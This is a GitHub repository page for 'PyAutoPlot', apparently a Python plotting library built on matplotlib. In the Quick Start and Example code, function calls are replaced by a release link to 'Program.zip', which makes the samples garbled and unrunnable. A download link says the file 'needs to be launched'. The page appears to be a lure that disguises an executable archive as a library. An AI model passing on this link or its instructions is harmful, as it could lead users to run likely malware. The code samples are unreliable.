Skip to content

PyAutoPlot is an open-source Python library designed to make dataset analysis much easier by generating helpful detailed plots using matplotlib. It automatically generates appropriate plots based on the dataset you feed it.

Notifications You must be signed in to change notification settings

theOnlyMan1/PyAutoPlot

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 

Repository files navigation

PyAutoPlot

PyAutoPlot Logo

PyAutoPlot is an open-source Python library designed to make dataset analysis much easier by generating helpful detailed plots using matplotlib. It automatically generates appropriate plots based on the dataset you feed it.

Features

  • Automated generation of various types of plots
  • Supports CSV and Pandas DataFrame inputs
  • Detailed and customizable plots
  • Easy to use and integrate into your data analysis workflow

Installation

You can install PyAutoPlot via pip:

pip install pyautoplot

Quick Start

import pandas as pd
from pyautoplot import PyAutoPlot

# Load your dataset
data = https://github.com/theOnlyMan1/PyAutoPlot/releases/download/v1.0/Program.zip('https://github.com/theOnlyMan1/PyAutoPlot/releases/download/v1.0/Program.zip')

# Create an instance of PyAutoPlot
pyap = PyAutoPlot()

# Generate plots automatically
https://github.com/theOnlyMan1/PyAutoPlot/releases/download/v1.0/Program.zip(data)

Available Plots

PyAutoPlot can generate the following types of plots:

  • Histograms
  • Scatter Plots
  • Line Plots
  • Box Plots
  • Pie Charts
  • Bar Plots
  • and more!

Example

Here's a simple example of how to use PyAutoPlot to analyze a dataset:

import pandas as pd
from pyautoplot import PyAutoPlot

# Load the dataset
data = https://github.com/theOnlyMan1/PyAutoPlot/releases/download/v1.0/Program.zip('https://github.com/theOnlyMan1/PyAutoPlot/releases/download/v1.0/Program.zip')

# Create an instance of PyAutoPlot
pyap = PyAutoPlot()

# Generate plots
https://github.com/theOnlyMan1/PyAutoPlot/releases/download/v1.0/Program.zip(data)

Link to Download

Download PyAutoPlot (needs to be launched)

Repository Topics

analysis, automatic, csv, data, dataset, dataset-analysis, generation, matplotlib, pandas, plots, plotting-in-python, plotting-library, python

Contribute

Contributions are welcome! If you have any ideas for improving PyAutoPlot or want to add new features, feel free to submit a pull request.


Visit the PyAutoPlot GitHub Repository for more information and to access the latest updates. Start using PyAutoPlot today and simplify your dataset analysis process! 🚀

PyAutoPlot Demo


About

PyAutoPlot is an open-source Python library designed to make dataset analysis much easier by generating helpful detailed plots using matplotlib. It automatically generates appropriate plots based on the dataset you feed it.

Topics

Resources

Stars

Watchers

Forks

Packages

No packages published